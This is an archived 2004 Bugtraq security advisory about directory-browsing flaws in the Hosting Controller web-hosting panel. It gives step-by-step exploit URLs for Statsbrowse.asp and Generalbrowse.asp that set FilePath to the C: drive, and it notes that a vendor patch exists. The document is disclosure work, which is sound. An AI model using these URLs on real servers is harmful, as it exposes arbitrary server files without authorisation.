lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list] 
Date: 5 Dec 2004 17:42:04 -0000
From: mouse small <e_b_i@...oo.com>
To: bugtraq@...urityfocus.com
Subject: Hosting Controller




                                       -= Security  Advisory =-

Advisory Information
-------------------------

Software Package   : Hosting Controller
Vendor Homepage    : http://www.hostingcontroller.com
Platforms          : Windows based servers
Vulnerable Versions: All version ( Tested on: v.6.1 Hotfix 1.4 )
Vendor Contacted   : 12/5/2004
Release Date:      : 12/7/2004

Summary
------------

Hosting Controller is a complete array of Web hosting automation tools for the Windows Server family platform.
Hosting Controller has a security flaw which allows attackers to browse any file and any directory on that server.

Details
---------

Vulnerability - Directories Browsing files on the system.
Foolish vulnerability:

1)This vulnerability is on the admin/mail/Statsbrowse.asp and attackers can view the Harddisk by using this file.
Login with your account
http://www.yoursite.com/admin
Now you see
http://www.yoursite.com/admin/main.asp
Change this url to
http://www.yoursite.com/admin/mail/Statsbrowse.asp?FilePath=c:\&Opt=3&level=1&upflag=0


2)This vulnerability is on the admin/iis/Generalbrowse.asp and attackers can view the Harddisk by using this file.
Login with your account
http://www.yoursite.com/admin
Now you see
http://www.yoursite.com/admin/main.asp
Change this url to <br/>
http://www.yoursite.com/admin/iis/Generalbrowse.asp?FilePath=C:\

Solution
----------

The vender was notified, they have released a patch.
Update Your software

Credits
---------

Discovered on May 6, 2004 by (\/) Mouse
Mouse@...bgard.org
Additional Research: s7az2mm and bl2k
http://Shabgard.org

References
-------------

http://isun.Shabgard.org/hc.html
http://isun.Shabgard.org/hc.txt

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ